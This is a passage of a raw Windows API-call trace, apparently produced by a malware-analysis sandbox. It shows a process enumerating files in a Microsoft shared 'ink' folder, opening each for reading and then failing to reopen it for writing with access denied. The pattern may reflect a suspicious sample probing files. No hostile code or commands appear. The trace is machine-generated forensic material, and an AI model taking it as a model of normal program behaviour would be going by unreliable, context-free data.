dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.459] AreFileApisANSI () returned 1 [0084.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml", lpUsedDefaultChar=0x0) returned 61 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0084.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.460] AreFileApisANSI () returned 1 [0084.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ea48 [0084.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned 61 [0084.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.460] GetFileType (hFile=0x364) returned 0x1 [0084.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.460] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.461] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.461] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.461] CloseHandle (hObject=0x364) returned 1 [0084.461] AreFileApisANSI () returned 1 [0084.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6eb58 [0084.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned 61 [0084.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.461] GetLastError () returned 0x5 [0084.461] GetLastError () returned 0x5 [0084.461] SetLastError (dwErrCode=0x5) [0084.461] GetLastError () returned 0x5 [0084.461] SetLastError (dwErrCode=0x5) [0084.461] GetLastError () returned 0x5 [0084.462] SetLastError (dwErrCode=0x5) [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.462] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0084.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0084.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.463] AreFileApisANSI () returned 1 [0084.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml", lpUsedDefaultChar=0x0) returned 61 [0084.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.463] AreFileApisANSI () returned 1 [0084.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e030 [0084.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned 61 [0084.463] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.464] GetFileType (hFile=0x364) returned 0x1 [0084.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0084.464] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.464] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.464] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.464] CloseHandle (hObject=0x364) returned 1 [0084.465] AreFileApisANSI () returned 1 [0084.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ea48 [0084.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned 61 [0084.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.465] GetLastError () returned 0x5 [0084.465] GetLastError () returned 0x5 [0084.465] SetLastError (dwErrCode=0x5) [0084.465] GetLastError () returned 0x5 [0084.465] SetLastError (dwErrCode=0x5) [0084.465] GetLastError () returned 0x5 [0084.465] SetLastError (dwErrCode=0x5) [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.465] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0084.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0084.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.466] AreFileApisANSI () returned 1 [0084.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml", lpUsedDefaultChar=0x0) returned 62 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.466] AreFileApisANSI () returned 1 [0084.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0084.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned 62 [0084.467] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.467] GetFileType (hFile=0x364) returned 0x1 [0084.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0084.467] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.467] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.467] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.467] CloseHandle (hObject=0x364) returned 1 [0084.468] AreFileApisANSI () returned 1 [0084.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0084.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned 62 [0084.468] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.468] GetLastError () returned 0x5 [0084.468] GetLastError () returned 0x5 [0084.468] SetLastError (dwErrCode=0x5) [0084.468] GetLastError () returned 0x5 [0084.468] SetLastError (dwErrCode=0x5) [0084.468] GetLastError () returned 0x5 [0084.468] SetLastError (dwErrCode=0x5) [0084.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0084.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.468] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.468] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.468] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d14d081, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d14d081, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0084.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0084.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0084.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0084.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 